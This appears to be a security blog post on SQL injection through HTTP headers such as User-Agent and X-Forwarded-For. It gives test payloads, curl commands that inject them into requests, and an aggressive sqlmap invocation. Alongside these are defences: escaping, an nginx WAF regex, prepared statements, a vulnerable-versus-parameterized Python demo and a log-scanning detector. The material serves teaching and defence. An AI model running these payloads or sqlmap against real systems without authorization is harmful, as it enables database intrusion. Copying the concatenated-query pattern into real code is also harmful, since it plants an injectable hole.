SQL Injection isn’t just limited to input parameters—attackers can exploit vulnerabilities through HTTP headers! This technique involves injecting malicious SQL payloads into headers such as:
🔹 User-Agent
🔹 Cookie
🔹 Referer
🔹 Authorization
🔹 X-Forwarded-For
A simple test payload to detect time-based SQLi:
" OR SLEEP(30)--
You Should Know: Practical Exploitation & Defense
Testing SQLi in Headers
1. Intercept HTTP Request (Burp Suite, OWASP ZAP):
sudo zaproxy
2. Modify Headers (Example with `curl`):
curl -H "User-Agent: ' OR 1=1--" http://example.com/login
3. Time-Based Detection:
curl -H "X-Forwarded-For: ' OR IF(1=1,SLEEP(5),0)--" http://example.com
Exploiting via SQLMap
Automate testing with SQLMap:
sqlmap -u http://example.com --headers="User-Agent: " --level=3 --risk=3
Defensive Measures
1. Input Sanitization:
$userAgent = mysqli_real_escape_string($conn, $_SERVER['HTTP_USER_AGENT']);
2. Web Application Firewall (WAF) Rules:
location / {
    # ~* makes the regex case-insensitive, so SLEEP(...) and sleep(...) are both caught;
    # the original ~ is case-sensitive and would miss the uppercase SLEEP payload shown above.
    if ($http_user_agent ~* "(\'|\"|--|sleep|benchmark)") {
        return 403;
    }
}
3. Prepared Statements (PHP Example):
$agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$stmt = $conn->prepare("SELECT * FROM users WHERE agent = ?");
$stmt->bind_param("s", $agent);
$stmt->execute();
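To make the difference between escaping-by-concatenation and a bound parameter concrete, here is an added example (not code from the post) that runs the same header value through a vulnerable lookup and a parameterized one. It uses Python's built-in sqlite3 instead of PHP/MySQL so it runs with no server; the users table and its rows are constructed sample data, and the injected value is the one from the curl example above.

```python
import sqlite3

# Constructed sample table: none of these agents equals the injected value.
SAMPLE_ROWS = [
    (1, "alice", "Mozilla/5.0 (X11; Linux x86_64)"),
    (2, "bob", "curl/8.4.0"),
    (3, "carol", "Mozilla/5.0 (Windows NT 10.0)"),
]

# Header value under test, taken from the post's curl example.
INJECTED_AGENT = "' OR 1=1--"


def make_db():
    """Build an in-memory SQLite database with a users table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, agent TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_agent):
    """Vulnerable: the header is spliced into the SQL text, so it can rewrite the WHERE clause.

    With the injected value the statement becomes
        SELECT id, name FROM users WHERE agent = '' OR 1=1--'
    and the trailing quote is swallowed by the -- comment.
    """
    sql = "SELECT id, name FROM users WHERE agent = '" + user_agent + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_agent):
    """Hardened: the header travels as a bound parameter and is only ever compared as data."""
    sql = "SELECT id, name FROM users WHERE agent = ?"
    return conn.execute(sql, (user_agent,)).fetchall()


def demo():
    """Run both lookups with the injected header and one legitimate header."""
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, INJECTED_AGENT),
        "parameterized": lookup_parameterized(conn, INJECTED_AGENT),
        "parameterized_legit": lookup_parameterized(conn, "curl/8.4.0"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The vulnerable lookup returns every row because the comparison collapses to `OR 1=1`; the parameterized lookup returns nothing for the injected value and exactly the matching row for a real agent string, because the driver never lets the header become SQL syntax.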
Log Analysis for Detection
Check suspicious logs with `grep`:
grep -iE "(sleep|benchmark|union select)" /var/log/nginx/access.log
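The grep above only sees whatever fields the access log records. As an added example (not part of the post), the following Python script parses log lines field by field and reports which header carried the suspicious value, and whether a timing payload coincided with a slow response. It assumes an nginx log_format that extends the standard "combined" format with `"$http_x_forwarded_for" $request_time`; the log lines and the 3-second threshold are constructed for the demonstration.

```python
import re

# Assumed nginx log_format (not from the post): "combined" plus the
# X-Forwarded-For header and $request_time in seconds, e.g.
#   '$remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent '
#   '"$http_referer" "$http_user_agent" "$http_x_forwarded_for" $request_time'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) - (?P<user>\S+) \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)" '
    r'"(?P<xff>[^"]*)" (?P<request_time>[\d.]+)$'
)

# Same indicators as the post's grep and WAF rule, matched case-insensitively.
SQLI_RE = re.compile(r"(sleep\s*\(|benchmark\s*\(|union\s+select|'|\"|--)", re.IGNORECASE)

# A timing indicator plus a response slower than this (seconds) is the
# signature of a successful time-based probe. Threshold is an assumption.
SLOW_SECONDS = 3.0

HEADER_FIELDS = ("user_agent", "referer", "xff")

# Constructed sample log: one clean request, then three with header payloads.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2025:10:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)" "-" 0.012
203.0.113.7 - - [10/Jan/2025:10:00:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "' OR 1=1--" "-" 0.015
203.0.113.7 - - [10/Jan/2025:10:00:09 +0000] "GET / HTTP/1.1" 200 512 "-" "curl/8.4.0" "' OR IF(1=1,SLEEP(5),0)--" 5.021
203.0.113.9 - - [10/Jan/2025:10:00:12 +0000] "GET /search?q=1 HTTP/1.1" 200 512 "http://example.com/' UNION SELECT 1,2--" "curl/8.4.0" "-" 0.020
"""


def scan_log(text):
    """Return one finding per (line, header field) whose value matches an SQLi indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a production tool would count these separately
        request_time = float(m.group("request_time"))
        for field in HEADER_FIELDS:
            hits = SQLI_RE.findall(m.group(field))
            if not hits:
                continue
            patterns = sorted({h.lower() for h in hits})
            timing = any(p.startswith(("sleep", "benchmark")) for p in patterns)
            findings.append({
                "line": lineno,
                "ip": m.group("ip"),
                "field": field,
                "patterns": patterns,
                "request_time": request_time,
                # Only flag slowness when a timing function was actually present.
                "slow_response": timing and request_time >= SLOW_SECONDS,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = " <-- slow response with timing payload" if f["slow_response"] else ""
        print(f"line {f['line']} {f['ip']} {f['field']}: {f['patterns']}{flag}")
```

Splitting the line into fields is what lets you say "the payload was in X-Forwarded-For, not in the URL", and correlating `sleep(`/`benchmark(` with `$request_time` separates a probe that merely arrived from one the database actually executed. The bare `'` and `--` indicators are noisy on real traffic (referers and some user agents contain them legitimately), so treat those hits as lower confidence than the function-name ones.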
What Undercode Say
SQLi via HTTP headers is a stealthy yet dangerous attack vector often overlooked in web security assessments. Ethical hackers should rigorously test headers in bug bounty programs, while developers must implement strict input validation and WAF rules.
Expected Output:
- Vulnerability Confirmation: Delayed response (SLEEP payload) or unintended data leakage.
- Mitigation: Proper escaping, parameterized queries, and WAF deployment.
Stay vigilant—headers are just as exploitable as form inputs!
Reported By: Jashim Sqlinjection – Hackers Feeds